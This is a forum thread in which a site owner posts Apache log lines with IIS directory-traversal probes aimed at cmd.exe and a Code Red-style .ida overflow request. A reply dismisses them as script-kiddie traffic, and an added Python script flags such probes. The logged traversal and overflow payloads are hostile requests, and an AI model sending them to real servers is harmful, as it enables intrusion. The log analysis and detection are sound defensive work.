apache logs, seeing weird things
Just been looking at my Apache access logs and I am noticing some weird stuff in them. When I see the date I have no idea who is getting into it or what's going on, and I have my site password protected so no one should be in it.
I will post the log, can someone see anything from it?
log
------------------------------------------------------------------------------------------
24.1.1x.x - - [09/Jan/2004:06:27:46 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1xx - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 468
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.218.x.x - - [09/Jan/2004:07:18:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 401 634
Not too much to worry about..
It's called a Directory traversal attack aimed at a M$ server, quite harmless to you. One look at the reply headers you have sent them and they will write you off their "possible" list.
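A way to triage lines like the ones in the log above, as an added example that is not part of the original thread: it unwraps repeated percent-encoding, flags the overlong byte pairs and the oversized `.ida` query, and reports from the status code whether Apache actually served anything. The function names, the `IDA_QUERY_MIN` threshold and the sample lines (built on the documentation address 192.0.2.10) are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Apache common log format: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
# Overlong/malformed UTF-8 byte pairs from the thread's log; treated as a separator for detection
OVERLONG_RE = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)
IDA_QUERY_MIN = 100  # assumed threshold for an oversized .ida query string

def fully_decode(path, max_rounds=5):
    """Percent-decode until stable, so %255c -> %5c -> backslash. Returns (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(line):
    """Return host, status, probe tags and whether the request was served; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, _method, target, status = m.groups()
    path, _, query = target.partition("?")
    tags = ["overlong-utf8"] if OVERLONG_RE.search(path) else []
    decoded, rounds = fully_decode(OVERLONG_RE.sub("/", path))
    if rounds > 1:
        tags.append("double-encoding")
    if ".." in decoded.replace("\\", "/").split("/"):
        tags.append("traversal")
    if decoded.lower().endswith("cmd.exe"):
        tags.append("cmd.exe")
    if decoded.lower().endswith(".ida") and len(query) >= IDA_QUERY_MIN:
        tags.append("ida-long-query")
    return {"host": host, "status": int(status), "tags": tags, "served": status[0] == "2"}

# Constructed sample lines modelled on the log above (192.0.2.10 is a documentation address)
FMT = '192.0.2.10 - - [09/Jan/2004:06:27:46 -0700] "GET {} HTTP/1.0" {} 634'
SAMPLE = [FMT.format(t, s) for t, s in [
    ("/scripts/..%255c../winnt/system32/cmd.exe?/c+dir", 401),
    ("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir", 401),
    ("/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir", 400),
    ("/default.ida?" + "X" * 224, 401), ("/index.html", 200)]]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line))
```

Any tagged line with `served` set to true is the one worth a closer look; in the sample, as in the log above, every probe ends in a 4xx status.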
thanks for the quick response, I won't worry about it then.
yep, this is what you call "script kiddies"